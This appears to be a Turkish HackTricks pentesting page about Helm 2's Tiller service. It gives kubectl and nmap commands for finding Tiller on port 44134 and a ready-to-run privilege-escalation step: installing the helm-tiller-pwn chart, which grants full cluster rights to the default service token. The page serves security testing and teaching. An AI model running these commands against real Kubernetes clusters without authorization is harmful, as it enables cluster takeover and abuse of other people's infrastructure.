tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.
Temel Bilgiler
Helm, Kubernetes için paket yöneticisidir. YAML dosyalarını paketlemeye ve bunları kamu ve özel depolarda dağıtmaya olanak tanır. Bu paketlere Helm Charts denir. Tiller, varsayılan olarak 44134 numaralı portta çalışan hizmettir.
Varsayılan port: 44134
PORT STATE SERVICE VERSION
44134/tcp open unknown
Enumeration
Eğer farklı ad alanlarının podlarını ve/veya hizmetlerini sıralayabiliyorsanız, bunları sıralayın ve adlarında "tiller" geçenleri arayın:
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
Örnekler:
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
Bu servisin çalıştığını bulmayı 44134 numaralı portu kontrol ederek de deneyebilirsiniz:
sudo nmap -sS -p 44134 <IP>
Bunu keşfettikten sonra, istemci helm uygulamasını indirerek onunla iletişim kurabilirsiniz. homebrew
gibi araçları kullanabilir veya resmi sürümler sayfasına** bakabilirsiniz.** Daha fazla ayrıntı veya diğer seçenekler için kurulum kılavuzuna bakın.
Ardından, hizmeti numaralandırabilirsiniz:
helm --host tiller-deploy.kube-system:44134 version
Yetki Yükseltme
Varsayılan olarak Helm2, kube-system ad alanında yüksek yetkilerle kuruldu, bu nedenle hizmeti bulup ona erişiminiz varsa, bu size yetki yükseltme imkanı verebilir.
Tek yapmanız gereken, tüm kümedeki her şeye varsayılan hizmet token erişimi verecek olan şu paketi kurmaktır: https://github.com/Ruil1n/helm-tiller-pwn
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
http://rui0.cn/archives/1573 adresinde saldırının açıklamasını bulabilirsiniz, ancak temelde, helm-tiller-pwn/pwnchart/templates/ içindeki clusterrole.yaml ve clusterrolebinding.yaml dosyalarını okursanız, tüm ayrıcalıkların varsayılan token'a nasıl verildiğini görebilirsiniz.
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.